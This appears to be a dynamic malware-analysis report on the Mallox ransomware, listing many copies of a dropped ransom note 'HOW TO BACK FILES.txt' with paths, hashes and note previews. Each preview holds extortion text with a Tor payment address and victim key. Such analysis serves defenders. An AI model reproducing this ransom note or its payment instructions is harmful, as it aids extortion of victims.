                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\ServiceWorkerFiles\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\Local\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\Local\Microsoft\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\Roaming\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\Roaming\Microsoft\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
